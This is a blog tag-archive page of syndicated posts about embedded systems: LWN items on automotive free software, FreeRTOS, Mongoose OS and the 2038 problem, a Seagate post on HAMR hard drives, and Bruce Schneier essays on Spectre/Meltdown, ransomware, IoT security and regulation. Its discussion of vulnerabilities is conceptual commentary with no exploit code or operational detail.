Tag Archives: Embedded Systems

[$] Prospects for free software in cars

Post Syndicated from jake original https://lwn.net/Articles/751165/rss

Car manufacturers, like most companies, navigate a narrow lane between the
benefits of using free and open-source software and the perceived or real
importance of hiding their trade secrets. Many are using
free software in some of the myriad software components that make up a
modern car, and even work in consortia to develop free software. At the
recent LibrePlanet
conference, free-software advocate Jeremiah Foster covered progress in the
automotive sector and made an impassioned case for more free software in their
embedded systems.

Subscribers can read on for a report on the talk by guest author Andy Oram.

Spectre and Meltdown Attacks Against Microprocessors

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/01/spectre_and_mel_1.html

The security of pretty much every computer on the planet has just gotten a lot worse, and the only real solution — which of course is not a solution — is to throw them all away and buy new ones.

On Wednesday, researchers just announced a series of major security vulnerabilities in the microprocessors at the heart of the world’s computers for the past 15-20 years. They’ve been named Spectre and Meltdown, and they have to do with manipulating different ways processors optimize performance by rearranging the order of instructions or performing different instructions in parallel. An attacker who controls one process on a system can use the vulnerabilities to steal secrets elsewhere on the computer. (The research papers are here and here.)

This means that a malicious app on your phone could steal data from your other apps. Or a malicious program on your computer — maybe one running in a browser window from that sketchy site you’re visiting, or as a result of a phishing attack — can steal data elsewhere on your machine. Cloud services, which often share machines amongst several customers, are especially vulnerable. This affects corporate applications running on cloud infrastructure, and end-user cloud applications like Google Drive. Someone can run a process in the cloud and steal data from every other users on the same hardware.

Information about these flaws has been secretly circulating amongst the major IT companies for months as they researched the ramifications and coordinated updates. The details were supposed to be released next week, but the story broke early and everyone is scrambling. By now all the major cloud vendors have patched their systems against the vulnerabilities that can be patched against.

“Throw it away and buy a new one” is ridiculous security advice, but it’s what US-CERT recommends. It is also unworkable. The problem is that there isn’t anything to buy that isn’t vulnerable. Pretty much every major processor made in the past 20 years is vulnerable to some flavor of these vulnerabilities. Patching against Meltdown can degrade performance by almost a third. And there’s no patch for Spectre; the microprocessors have to be redesigned to prevent the attack, and that will take years. (Here’s a running list of who’s patched what.)

This is bad, but expect it more and more. Several trends are converging in a way that makes our current system of patching security vulnerabilities harder to implement.

The first is that these vulnerabilities affect embedded computers in consumer devices. Unlike our computer and phones, these systems are designed and produced at a lower profit margin with less engineering expertise. There aren’t security teams on call to write patches, and there often aren’t mechanisms to push patches onto the devices. We’re already seeing this with home routers, digital video recorders, and webcams. The vulnerability that allowed them to be taken over by the Mirai botnet last August simply can’t be fixed.

The second is that some of the patches require updating the computer’s firmware. This is much harder to walk consumers through, and is more likely to permanently brick the device if something goes wrong. It also requires more coordination. In November, Intel released a firmware update to fix a vulnerability in its Management Engine (ME): another flaw in its microprocessors. But it couldn’t get that update directly to users; it had to work with the individual hardware companies, and some of them just weren’t capable of getting the update to their customers.

We’re already seeing this. Some patches require users to disable the computer’s password, which means organizations can’t automate the patch. Some antivirus software blocks the patch, or — worse — crashes the computer. This results in a three-step process: patch your antivirus software, patch your operating system, and then patch the computer’s firmware.

The final reason is the nature of these vulnerabilities themselves. These aren’t normal software vulnerabilities, where a patch fixes the problem and everyone can move on. These vulnerabilities are in the fundamentals of how the microprocessor operates.

It shouldn’t be surprising that microprocessor designers have been building insecure hardware for 20 years. What’s surprising is that it took 20 years to discover it. In their rush to make computers faster, they weren’t thinking about security. They didn’t have the expertise to find these vulnerabilities. And those who did were too busy finding normal software vulnerabilities to examine microprocessors. Security researchers are starting to look more closely at these systems, so expect to hear about more vulnerabilities along these lines.

Spectre and Meltdown are pretty catastrophic vulnerabilities, but they only affect the confidentiality of data. Now that they — and the research into the Intel ME vulnerability — have shown researchers where to look, more is coming — and what they’ll find will be worse than either Spectre or Meltdown. There will be vulnerabilities that will allow attackers to manipulate or delete data across processes, potentially fatal in the computers controlling our cars or implanted medical devices. These will be similarly impossible to fix, and the only strategy will be to throw our devices away and buy new ones.

This isn’t to say you should immediately turn your computers and phones off and not use them for a few years. For the average user, this is just another attack method amongst many. All the major vendors are working on patches and workarounds for the attacks they can mitigate. All the normal security advice still applies: watch for phishing attacks, don’t click on strange e-mail attachments, don’t visit sketchy websites that might run malware on your browser, patch your systems regularly, and generally be careful on the Internet.

You probably won’t notice that performance hit once Meltdown is patched, except maybe in backup programs and networking applications. Embedded systems that do only one task, like your programmable thermostat or the computer in your refrigerator, are unaffected. Small microprocessors that don’t do all of the vulnerable fancy performance tricks are unaffected. Browsers will figure out how to mitigate this in software. Overall, the security of the average Internet-of-Things device is so bad that this attack is in the noise compared to the previously known risks.

It’s a much bigger problem for cloud vendors; the performance hit will be expensive, but I expect that they’ll figure out some clever way of detecting and blocking the attacks. All in all, as bad as Spectre and Meltdown are, I think we got lucky.

But more are coming, and they’ll be worse. 2018 will be the year of microprocessor vulnerabilities, and it’s going to be a wild ride.

Note: A shorter version of this essay previously appeared on CNN.com. My previous blog post on this topic contains additional links.

What is HAMR and How Does It Enable the High-Capacity Needs of the Future?

Post Syndicated from Andy Klein original https://www.backblaze.com/blog/hamr-hard-drives/

HAMR drive illustration

During Q4, Backblaze deployed 100 petabytes worth of Seagate hard drives to our data centers. The newly deployed Seagate 10 and 12 TB drives are doing well and will help us meet our near term storage needs, but we know we’re going to need more drives — with higher capacities. That’s why the success of new hard drive technologies like Heat-Assisted Magnetic Recording (HAMR) from Seagate are very relevant to us here at Backblaze and to the storage industry in general. In today’s guest post we are pleased to have Mark Re, CTO at Seagate, give us an insider’s look behind the hard drive curtain to tell us how Seagate engineers are developing the HAMR technology and making it market ready starting in late 2018.

What is HAMR and How Does It Enable the High-Capacity Needs of the Future?

Guest Blog Post by Mark Re, Seagate Senior Vice President and Chief Technology Officer

Earlier this year Seagate announced plans to make the first hard drives using Heat-Assisted Magnetic Recording, or HAMR, available by the end of 2018 in pilot volumes. Even as today’s market has embraced 10TB+ drives, the need for 20TB+ drives remains imperative in the relative near term. HAMR is the Seagate research team’s next major advance in hard drive technology.

HAMR is a technology that over time will enable a big increase in the amount of data that can be stored on a disk. A small laser is attached to a recording head, designed to heat a tiny spot on the disk where the data will be written. This allows a smaller bit cell to be written as either a 0 or a 1. The smaller bit cell size enables more bits to be crammed into a given surface area — increasing the areal density of data, and increasing drive capacity.

It sounds almost simple, but the science and engineering expertise required, the research, experimentation, lab development and product development to perfect this technology has been enormous. Below is an overview of the HAMR technology and you can dig into the details in our technical brief that provides a point-by-point rundown describing several key advances enabling the HAMR design.

As much time and resources as have been committed to developing HAMR, the need for its increased data density is indisputable. Demand for data storage keeps increasing. Businesses’ ability to manage and leverage more capacity is a competitive necessity, and IT spending on capacity continues to increase.

History of Increasing Storage Capacity

For the last 50 years areal density in the hard disk drive has been growing faster than Moore’s law, which is a very good thing. After all, customers from data centers and cloud service providers to creative professionals and game enthusiasts rarely go shopping looking for a hard drive just like the one they bought two years ago. The demands of increasing data on storage capacities inevitably increase, thus the technology constantly evolves.

According to the Advanced Storage Technology Consortium, HAMR will be the next significant storage technology innovation to increase the amount of storage in the area available to store data, also called the disk’s “areal density.” We believe this boost in areal density will help fuel hard drive product development and growth through the next decade.

Why do we Need to Develop Higher-Capacity Hard Drives? Can’t Current Technologies do the Job?

Why is HAMR’s increased data density so important?

Data has become critical to all aspects of human life, changing how we’re educated and entertained. It affects and informs the ways we experience each other and interact with businesses and the wider world. IDC research shows the datasphere — all the data generated by the world’s businesses and billions of consumer endpoints — will continue to double in size every two years. IDC forecasts that by 2025 the global datasphere will grow to 163 zettabytes (that is a trillion gigabytes). That’s ten times the 16.1 ZB of data generated in 2016. IDC cites five key trends intensifying the role of data in changing our world: embedded systems and the Internet of Things (IoT), instantly available mobile and real-time data, cognitive artificial intelligence (AI) systems, increased security data requirements, and critically, the evolution of data from playing a business background to playing a life-critical role.

Consumers use the cloud to manage everything from family photos and videos to data about their health and exercise routines. Real-time data created by connected devices — everything from Fitbit, Alexa and smart phones to home security systems, solar systems and autonomous cars — are fueling the emerging Data Age. On top of the obvious business and consumer data growth, our critical infrastructure like power grids, water systems, hospitals, road infrastructure and public transportation all demand and add to the growth of real-time data. Data is now a vital element in the smooth operation of all aspects of daily life.

All of this entails a significant infrastructure cost behind the scenes with the insatiable, global appetite for data storage. While a variety of storage technologies will continue to advance in data density (Seagate announced the first 60TB 3.5-inch SSD unit for example), high-capacity hard drives serve as the primary foundational core of our interconnected, cloud and IoT-based dependence on data.

HAMR Hard Drive Technology

Seagate has been working on heat assisted magnetic recording (HAMR) in one form or another since the late 1990s. During this time we’ve made many breakthroughs in making reliable near field transducers, special high capacity HAMR media, and figuring out a way to put a laser on each and every head that is no larger than a grain of salt.

The development of HAMR has required Seagate to consider and overcome a myriad of scientific and technical challenges including new kinds of magnetic media, nano-plasmonic device design and fabrication, laser integration, high-temperature head-disk interactions, and thermal regulation.

A typical hard drive inside any computer or server contains one or more rigid disks coated with a magnetically sensitive film consisting of tiny magnetic grains. Data is recorded when a magnetic write-head flies just above the spinning disk; the write head rapidly flips the magnetization of one magnetic region of grains so that its magnetic pole points up or down, to encode a 1 or a 0 in binary code.

Increasing the amount of data you can store on a disk requires cramming magnetic regions closer together, which means the grains need to be smaller so they won’t interfere with each other.

Heat Assisted Magnetic Recording (HAMR) is the next step to enable us to increase the density of grains — or bit density. Current projections are that HAMR can achieve 5 Tbpsi (Terabits per square inch) on conventional HAMR media, and in the future will be able to achieve 10 Tbpsi or higher with bit patterned media (in which discrete dots are predefined on the media in regular, efficient, very dense patterns). These technologies will enable hard drives with capacities higher than 100 TB before 2030.

The major problem with packing bits so closely together is that if you do that on conventional magnetic media, the bits (and the data they represent) become thermally unstable, and may flip. So, to make the grains maintain their stability — their ability to store bits over a long period of time — we need to develop a recording media that has higher coercivity. That means it’s magnetically more stable during storage, but it is more difficult to change the magnetic characteristics of the media when writing (harder to flip a grain from a 0 to a 1 or vice versa).

That’s why HAMR’s first key hardware advance required developing a new recording media that keeps bits stable — using high anisotropy (or “hard”) magnetic materials such as iron-platinum alloy (FePt), which resist magnetic change at normal temperatures. Over years of HAMR development, Seagate researchers have tested and proven out a variety of FePt granular media films, with varying alloy composition and chemical ordering.

In fact the new media is so “hard” that conventional recording heads won’t be able to flip the bits, or write new data, under normal temperatures. If you add heat to the tiny spot on which you want to write data, you can make the media’s coercive field lower than the magnetic field provided by the recording head — in other words, enable the write head to flip that bit.

So, a challenge with HAMR has been to replace conventional perpendicular magnetic recording (PMR), in which the write head operates at room temperature, with a write technology that heats the thin film recording medium on the disk platter to temperatures above 400 °C. The basic principle is to heat a tiny region of several magnetic grains for a very short time (~1 nanoseconds) to a temperature high enough to make the media’s coercive field lower than the write head’s magnetic field. Immediately after the heat pulse, the region quickly cools down and the bit’s magnetic orientation is frozen in place.

Applying this dynamic nano-heating is where HAMR’s famous “laser” comes in. A plasmonic near-field transducer (NFT) has been integrated into the recording head, to heat the media and enable magnetic change at a specific point. Plasmonic NFTs are used to focus and confine light energy to regions smaller than the wavelength of light. This enables us to heat an extremely small region, measured in nanometers, on the disk media to reduce its magnetic coercivity,

Moving HAMR Forward

HAMR write head

As always in advanced engineering, the devil — or many devils — is in the details. As noted earlier, our technical brief provides a point-by-point short illustrated summary of HAMR’s key changes.

Although hard work remains, we believe this technology is nearly ready for commercialization. Seagate has the best engineers in the world working towards a goal of a 20 Terabyte drive by 2019. We hope we’ve given you a glimpse into the amount of engineering that goes into a hard drive. Keeping up with the world’s insatiable appetite to create, capture, store, secure, manage, analyze, rapidly access and share data is a challenge we work on every day.

With thousands of HAMR drives already being made in our manufacturing facilities, our internal and external supply chain is solidly in place, and volume manufacturing tools are online. This year we began shipping initial units for customer tests, and production units will ship to key customers by the end of 2018. Prepare for breakthrough capacities.

The post What is HAMR and How Does It Enable the High-Capacity Needs of the Future? appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Announcing FreeRTOS Kernel Version 10 (AWS Open Source Blog)

Post Syndicated from jake original https://lwn.net/Articles/740372/rss

Amazon has announced the release of FreeRTOS kernel version 10, with a new license: “FreeRTOS was created in 2003 by Richard Barry. It rapidly became popular, consistently ranking very high in EETimes surveys on embedded operating systems. After 15 years of maintaining this critical piece of software infrastructure with very limited human resources, last year Richard joined Amazon.

Today we are releasing the core open source code as FreeRTOS kernel version 10, now under the MIT license (instead of its previous modified GPLv2 license). Simplified licensing has long been requested by the FreeRTOS community. The specific choice of the MIT license was based on the needs of the embedded systems community: the MIT license is commonly used in open hardware projects, and is generally whitelisted for enterprise use.” While the modified GPLv2 was removed, it was replaced with a slightly modified MIT license that adds: “If you wish to use our Amazon FreeRTOS name, please do so in a
fair use way that does not cause confusion.
” There is concern that change makes it a different license; the Open Source Initiative and Amazon open-source folks are working on clarifying that.

[$] Mongoose OS for IoT prototyping

Post Syndicated from jake original https://lwn.net/Articles/733297/rss

Mongoose OS is an open-source
operating system for tiny embedded systems. It is designed to run on
devices such as microcontrollers, which are often constrained with memory on the
order of tens of kilobytes, while exposing a programming interface that
provides access to modern APIs normally found on more powerful devices. A
device running Mongoose OS has access to operating system functionality
such as filesystems and networking, plus higher-level software such as a
JavaScript engine and cloud access APIs.

Vulnerabilities in Car Washes

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/08/vulnerabilities_6.html

Articles about serious vulnerabilities in IoT devices and embedded systems are now dime-a-dozen. This one concerns Internet-connected car washes:

A group of security researchers have found vulnerabilities in internet-connected drive-through car washes that would let hackers remotely hijack the systems to physically attack vehicles and their occupants. The vulnerabilities would let an attacker open and close the bay doors on a car wash to trap vehicles inside the chamber, or strike them with the doors, damaging them and possibly injuring occupants.

The Future of Ransomware

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/05/the_future_of_r.html

Ransomware isn’t new, but it’s increasingly popular and profitable.

The concept is simple: Your computer gets infected with a virus that encrypts your files until you pay a ransom. It’s extortion taken to its networked extreme. The criminals provide step-by-step instructions on how to pay, sometimes even offering a help line for victims unsure how to buy bitcoin. The price is designed to be cheap enough for people to pay instead of giving up: a few hundred dollars in many cases. Those who design these systems know their market, and it’s a profitable one.

The ransomware that has affected systems in more than 150 countries recently, WannaCry, made press headlines last week, but it doesn’t seem to be more virulent or more expensive than other ransomware. This one has a particularly interesting pedigree: It’s based on a vulnerability developed by the National Security Agency that can be used against many versions of the Windows operating system. The NSA’s code was, in turn, stolen by an unknown hacker group called Shadow Brokers ­ widely believed by the security community to be the Russians ­ in 2014 and released to the public in April.

Microsoft patched the vulnerability a month earlier, presumably after being alerted by the NSA that the leak was imminent. But the vulnerability affected older versions of Windows that Microsoft no longer supports, and there are still many people and organizations that don’t regularly patch their systems. This allowed whoever wrote WannaCry ­– it could be anyone from a lone individual to an organized crime syndicate — to use it to infect computers and extort users.

The lessons for users are obvious: Keep your system patches up to date and regularly backup your data. This isn’t just good advice to defend against ransomware, but good advice in general. But it’s becoming obsolete.

Everything is becoming a computer. Your microwave is a computer that makes things hot. Your refrigerator is a computer that keeps things cold. Your car and television, the traffic lights and signals in your city and our national power grid are all computers. This is the much-hyped Internet of Things (IoT). It’s coming, and it’s coming faster than you might think. And as these devices connect to the Internet, they become vulnerable to ransomware and other computer threats.

It’s only a matter of time before people get messages on their car screens saying that the engine has been disabled and it will cost $200 in bitcoin to turn it back on. Or a similar message on their phones about their Internet-enabled door lock: Pay $100 if you want to get into your house tonight. Or pay far more if they want their embedded heart defibrillator to keep working.

This isn’t just theoretical. Researchers have already demonstrated a ransomware attack against smart thermostats, which may sound like a nuisance at first but can cause serious property damage if it’s cold enough outside. If the device under attack has no screen, you’ll get the message on the smartphone app you control it from.

Hackers don’t even have to come up with these ideas on their own; the government agencies whose code was stolen were already doing it. One of the leaked CIA attack tools targets Internet-enabled Samsung smart televisions.

Even worse, the usual solutions won’t work with these embedded systems. You have no way to back up your refrigerator’s software, and it’s unclear whether that solution would even work if an attack targets the functionality of the device rather than its stored data.

These devices will be around for a long time. Unlike our phones and computers, which we replace every few years, cars are expected to last at least a decade. We want our appliances to run for 20 years or more, our thermostats even longer.

What happens when the company that made our smart washing machine — or just the computer part — goes out of business, or otherwise decides that they can no longer support older models? WannaCry affected Windows versions as far back as XP, a version that Microsoft no longer supports. The company broke with policy and released a patch for those older systems, but it has both the engineering talent and the money to do so.

That won’t happen with low-cost IoT devices.

Those devices are built on the cheap, and the companies that make them don’t have the dedicated teams of security engineers ready to craft and distribute security patches. The economics of the IoT doesn’t allow for it. Even worse, many of these devices aren’t patchable. Remember last fall when the Mirai botnet infected hundreds of thousands of Internet-enabled digital video recorders, webcams and other devices and launched a massive denial-of-service attack that resulted in a host of popular websites dropping off the Internet? Most of those devices couldn’t be fixed with new software once they were attacked. The way you update your DVR is to throw it away and buy a new one.

Solutions aren’t easy and they’re not pretty. The market is not going to fix this unaided. Security is a hard-to-evaluate feature against a possible future threat, and consumers have long rewarded companies that provide easy-to-compare features and a quick time-to-market at its expense. We need to assign liabilities to companies that write insecure software that harms people, and possibly even issue and enforce regulations that require companies to maintain software systems throughout their life cycle. We may need minimum security standards for critical IoT devices. And it would help if the NSA got more involved in securing our information infrastructure and less in keeping it vulnerable so the government can eavesdrop.

I know this all sounds politically impossible right now, but we simply cannot live in a future where everything — from the things we own to our nation’s infrastructure ­– can be held for ransom by criminals again and again.

This essay previously appeared in the Washington Post.

Acoustic Attack Against Accelerometers

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/04/acoustic_attack.html

Interesting acoustic attack against the MEMS accelerometers in devices like FitBits.

Millions of accelerometers reside inside smartphones, automobiles, medical devices, anti-theft devices, drones, IoT devices, and many other industrial and consumer applications. Our work investigates how analog acoustic injection attacks can damage the digital integrity of the capacitive MEMS accelerometer. Spoofing such sensors with intentional acoustic interference enables an out-of-spec pathway for attackers to deliver chosen digital values to microprocessors and embedded systems that blindly trust the unvalidated integrity of sensor outputs. Our contributions include (1) modeling the physics of malicious acoustic interference on MEMS accelerometers, (2) discovering the circuit-level security flaws that cause the vulnerabilities by measuring acoustic injection attacks on MEMS accelerometers as well as systems that employ on these sensors, and (3) two software-only defenses that mitigate many of the risks to the integrity of MEMS accelerometer outputs.

This is not that a big deal with things like FitBits, but as IoT devices get more autonomous — and start making decisions and then putting them into effect automatically — these vulnerabilities will become critical.

Academic paper.

[$] 2038: only 21 years away

Post Syndicated from corbet original https://lwn.net/Articles/717076/rss

Sometimes it seems that things have gone relatively quiet on the year-2038
front. But time keeps moving forward, and the point in early 2038 when
32-bit time_t values can no longer represent times correctly is
now less than 21 years away. That may seem like a long time, but the
relatively long life cycle of many
embedded systems means that some systems deployed today will still be in
service when that deadline hits. One of the developers leading the effort
to address this problem is Arnd Bergmann; at Linaro Connect 2017 he gave an
update on where that work stands.

Security and Privacy Guidelines for the Internet of Things

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/02/security_and_pr.html

Lately, I have been collecting IoT security and privacy guidelines. Here’s everything I’ve found:

  1. Internet of Things (IoT) Broadband Internet Technical Advisory Group, Broadband Internet Technical Advisory Group, Nov 2016.
  2. IoT Security Guidance,” Open Web Application Security Project (OWASP), May 2016.

  3. Strategic Principles for Securing the Internet of Things (IoT),” US Department of Homeland Security, Nov 2016.

  4. Security,” OneM2M Technical Specification, Aug 2016.

  5. Security Solutions,” OneM2M Technical Specification, Aug 2016.

  6. IoT Security Guidelines Overview Document,” GSM Alliance, Feb 2016.

  7. IoT Security Guidelines For Service Ecosystems,” GSM Alliance, Feb 2016.

  8. IoT Security Guidelines for Endpoint Ecosystems,” GSM Alliance, Feb 2016.

  9. IoT Security Guidelines for Network Operators,” GSM Alliance, Feb 2016.

  10. Establishing Principles for Internet of Things Security,” IoT Security Foundation, undated.

  11. IoT Design Manifesto,” May 2015.

  12. NYC Guidelines for the Internet of Things,” City of New York, undated.

  13. IoT Security Compliance Framework,” IoT Security Foundation, 2016.

  14. Principles, Practices and a Prescription for Responsible IoT and Embedded Systems Development,” IoTIAP, Nov 2016.

  15. IoT Trust Framework,” Online Trust Alliance, Jan 2017.

  16. Five Star Automotive Cyber Safety Framework,” I am the Cavalry, Feb 2015.

  17. Hippocratic Oath for Connected Medical Devices,” I am the Cavalry, Jan 2016.

Other, related, items:

  1. We All Live in the Computer Now,” The Netgain Partnership, Oct 2016.
  2. Comments of EPIC to the FTC on the Privacy and Security Implications of the Internet of Things,” Electronic Privacy Information Center, Jun 2013.

  3. Internet of Things Software Update Workshop (IoTSU),” Internet Architecture Board, Jun 2016.

They all largely say the same things: avoid known vulnerabilities, don’t have insecure defaults, make your systems patchable, and so on.

My guess is that everyone knows that IoT regulation is coming, and is either trying to impose self-regulation to forestall government action or establish principles to influence government action. It’ll be interesting to see how the next few years unfold.

If there are any IoT security or privacy guideline documents that I’m missing, please tell me in the comments.

Dz: Seccomp sandboxing not enabled for acme-client

Post Syndicated from jake original https://lwn.net/Articles/713464/rss

In the acme-client-portable repository at GitHub, developer Kristaps Dz has a rather stinging indictment of trying to use seccomp sandboxing for the portable version of acme-client, which is a client program for getting Let’s Encrypt certificates. He has disabled seccomp filtering in the default build for a number of reasons. “So I might use mmap, but the system call is mmap2? Great. This brings us to the second and larger problem. The C library. There are several popular ones on Linux: glibc, musl, uClibc, etc. Each of these is free to implement any standard function (like mmap, above) in any way. So while my code might say read, the C library might also invoke fstat. Great.

In general, section 2 calls (system calls) map evenly between system call name and function name. (Except as noted above… and maybe elsewhere…) However, section 3 is all over the place. The strongest differences were between big functions like getaddrinfo(2).

Then there’s local modifications. And not just between special embedded systems. But Debian and Arch, both using glibc and both on x86_64, have different kernels installed with different features. Great.

Less great for me and seccomp.” (Thanks to Paul Wise.)

Security and the Internet of Things

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/02/security_and_th.html

Last year, on October 21, your digital video recorder ­- or at least a DVR like yours ­- knocked Twitter off the internet. Someone used your DVR, along with millions of insecure webcams, routers, and other connected devices, to launch an attack that started a chain reaction, resulting in Twitter, Reddit, Netflix, and many sites going off the internet. You probably didn’t realize that your DVR had that kind of power. But it does.

All computers are hackable. This has as much to do with the computer market as it does with the technologies. We prefer our software full of features and inexpensive, at the expense of security and reliability. That your computer can affect the security of Twitter is a market failure. The industry is filled with market failures that, until now, have been largely ignorable. As computers continue to permeate our homes, cars, businesses, these market failures will no longer be tolerable. Our only solution will be regulation, and that regulation will be foisted on us by a government desperate to “do something” in the face of disaster.

In this article I want to outline the problems, both technical and political, and point to some regulatory solutions. Regulation might be a dirty word in today’s political climate, but security is the exception to our small-government bias. And as the threats posed by computers become greater and more catastrophic, regulation will be inevitable. So now’s the time to start thinking about it.

We also need to reverse the trend to connect everything to the internet. And if we risk harm and even death, we need to think twice about what we connect and what we deliberately leave uncomputerized.

If we get this wrong, the computer industry will look like the pharmaceutical industry, or the aircraft industry. But if we get this right, we can maintain the innovative environment of the internet that has given us so much.

**********

We no longer have things with computers embedded in them. We have computers with things attached to them.

Your modern refrigerator is a computer that keeps things cold. Your oven, similarly, is a computer that makes things hot. An ATM is a computer with money inside. Your car is no longer a mechanical device with some computers inside; it’s a computer with four wheels and an engine. Actually, it’s a distributed system of over 100 computers with four wheels and an engine. And, of course, your phones became full-power general-purpose computers in 2007, when the iPhone was introduced.

We wear computers: fitness trackers and computer-enabled medical devices ­- and, of course, we carry our smartphones everywhere. Our homes have smart thermostats, smart appliances, smart door locks, even smart light bulbs. At work, many of those same smart devices are networked together with CCTV cameras, sensors that detect customer movements, and everything else. Cities are starting to embed smart sensors in roads, streetlights, and sidewalk squares, also smart energy grids and smart transportation networks. A nuclear power plant is really just a computer that produces electricity, and ­- like everything else we’ve just listed -­ it’s on the internet.

The internet is no longer a web that we connect to. Instead, it’s a computerized, networked, and interconnected world that we live in. This is the future, and what we’re calling the Internet of Things.

Broadly speaking, the Internet of Things has three parts. There are the sensors that collect data about us and our environment: smart thermostats, street and highway sensors, and those ubiquitous smartphones with their motion sensors and GPS location receivers. Then there are the “smarts” that figure out what the data means and what to do about it. This includes all the computer processors on these devices and ­- increasingly ­- in the cloud, as well as the memory that stores all of this information. And finally, there are the actuators that affect our environment. The point of a smart thermostat isn’t to record the temperature; it’s to control the furnace and the air conditioner. Driverless cars collect data about the road and the environment to steer themselves safely to their destinations.

You can think of the sensors as the eyes and ears of the internet. You can think of the actuators as the hands and feet of the internet. And you can think of the stuff in the middle as the brain. We are building an internet that senses, thinks, and acts.

This is the classic definition of a robot. We’re building a world-size robot, and we don’t even realize it.

To be sure, it’s not a robot in the classical sense. We think of robots as discrete autonomous entities, with sensors, brain, and actuators all together in a metal shell. The world-size robot is distributed. It doesn’t have a singular body, and parts of it are controlled in different ways by different people. It doesn’t have a central brain, and it has nothing even remotely resembling a consciousness. It doesn’t have a single goal or focus. It’s not even something we deliberately designed. It’s something we have inadvertently built out of the everyday objects we live with and take for granted. It is the extension of our computers and networks into the real world.

This world-size robot is actually more than the Internet of Things. It’s a combination of several decades-old computing trends: mobile computing, cloud computing, always-on computing, huge databases of personal information, the Internet of Things ­- or, more precisely, cyber-physical systems ­- autonomy, and artificial intelligence. And while it’s still not very smart, it’ll get smarter. It’ll get more powerful and more capable through all the interconnections we’re building.

It’ll also get much more dangerous.

**********

Computer security has been around for almost as long as computers have been. And while it’s true that security wasn’t part of the design of the original internet, it’s something we have been trying to achieve since its beginning.

I have been working in computer security for over 30 years: first in cryptography, then more generally in computer and network security, and now in general security technology. I have watched computers become ubiquitous, and have seen firsthand the problems ­- and solutions ­- of securing these complex machines and systems. I’m telling you all this because what used to be a specialized area of expertise now affects everything. Computer security is now everything security. There’s one critical difference, though: The threats have become greater.

Traditionally, computer security is divided into three categories: confidentiality, integrity, and availability. For the most part, our security concerns have largely centered around confidentiality. We’re concerned about our data and who has access to it ­- the world of privacy and surveillance, of data theft and misuse.

But threats come in many forms. Availability threats: computer viruses that delete our data, or ransomware that encrypts our data and demands payment for the unlock key. Integrity threats: hackers who can manipulate data entries can do things ranging from changing grades in a class to changing the amount of money in bank accounts. Some of these threats are pretty bad. Hospitals have paid tens of thousands of dollars to criminals whose ransomware encrypted critical medical files. JPMorgan Chase spends half a billion on cybersecurity a year.

Today, the integrity and availability threats are much worse than the confidentiality threats. Once computers start affecting the world in a direct and physical manner, there are real risks to life and property. There is a fundamental difference between crashing your computer and losing your spreadsheet data, and crashing your pacemaker and losing your life. This isn’t hyperbole; recently researchers found serious security vulnerabilities in St. Jude Medical’s implantable heart devices. Give the internet hands and feet, and it will have the ability to punch and kick.

Take a concrete example: modern cars, those computers on wheels. The steering wheel no longer turns the axles, nor does the accelerator pedal change the speed. Every move you make in a car is processed by a computer, which does the actual controlling. A central computer controls the dashboard. There’s another in the radio. The engine has 20 or so computers. These are all networked, and increasingly autonomous.

Now, let’s start listing the security threats. We don’t want car navigation systems to be used for mass surveillance, or the microphone for mass eavesdropping. We might want it to be used to determine a car’s location in the event of a 911 call, and possibly to collect information about highway congestion. We don’t want people to hack their own cars to bypass emissions-control limitations. We don’t want manufacturers or dealers to be able to do that, either, as Volkswagen did for years. We can imagine wanting to give police the ability to remotely and safely disable a moving car; that would make high-speed chases a thing of the past. But we definitely don’t want hackers to be able to do that. We definitely don’t want them disabling the brakes in every car without warning, at speed. As we make the transition from driver-controlled cars to cars with various driver-assist capabilities to fully driverless cars, we don’t want any of those critical components subverted. We don’t want someone to be able to accidentally crash your car, let alone do it on purpose. And equally, we don’t want them to be able to manipulate the navigation software to change your route, or the door-lock controls to prevent you from opening the door. I could go on.

That’s a lot of different security requirements, and the effects of getting them wrong range from illegal surveillance to extortion by ransomware to mass death.

**********

Our computers and smartphones are as secure as they are because companies like Microsoft, Apple, and Google spend a lot of time testing their code before it’s released, and quickly patch vulnerabilities when they’re discovered. Those companies can support large, dedicated teams because those companies make a huge amount of money, either directly or indirectly, from their software ­ and, in part, compete on its security. Unfortunately, this isn’t true of embedded systems like digital video recorders or home routers. Those systems are sold at a much lower margin, and are often built by offshore third parties. The companies involved simply don’t have the expertise to make them secure.

At a recent hacker conference, a security researcher analyzed 30 home routers and was able to break into half of them, including some of the most popular and common brands. The denial-of-service attacks that forced popular websites like Reddit and Twitter off the internet last October were enabled by vulnerabilities in devices like webcams and digital video recorders. In August, two security researchers demonstrated a ransomware attack on a smart thermostat.

Even worse, most of these devices don’t have any way to be patched. Companies like Microsoft and Apple continuously deliver security patches to your computers. Some home routers are technically patchable, but in a complicated way that only an expert would attempt. And the only way for you to update the firmware in your hackable DVR is to throw it away and buy a new one.

The market can’t fix this because neither the buyer nor the seller cares. The owners of the webcams and DVRs used in the denial-of-service attacks don’t care. Their devices were cheap to buy, they still work, and they don’t know any of the victims of the attacks. The sellers of those devices don’t care: They’re now selling newer and better models, and the original buyers only cared about price and features. There is no market solution, because the insecurity is what economists call an externality: It’s an effect of the purchasing decision that affects other people. Think of it kind of like invisible pollution.

**********

Security is an arms race between attacker and defender. Technology perturbs that arms race by changing the balance between attacker and defender. Understanding how this arms race has unfolded on the internet is essential to understanding why the world-size robot we’re building is so insecure, and how we might secure it. To that end, I have five truisms, born from what we’ve already learned about computer and internet security. They will soon affect the security arms race everywhere.

Truism No. 1: On the internet, attack is easier than defense.

There are many reasons for this, but the most important is the complexity of these systems. More complexity means more people involved, more parts, more interactions, more mistakes in the design and development process, more of everything where hidden insecurities can be found. Computer-security experts like to speak about the attack surface of a system: all the possible points an attacker might target and that must be secured. A complex system means a large attack surface. The defender has to secure the entire attack surface. The attacker just has to find one vulnerability ­- one unsecured avenue for attack -­ and gets to choose how and when to attack. It’s simply not a fair battle.

There are other, more general, reasons why attack is easier than defense. Attackers have a natural agility that defenders often lack. They don’t have to worry about laws, and often not about morals or ethics. They don’t have a bureaucracy to contend with, and can more quickly make use of technical innovations. Attackers also have a first-mover advantage. As a society, we’re generally terrible at proactive security; we rarely take preventive security measures until an attack actually happens. So more advantages go to the attacker.

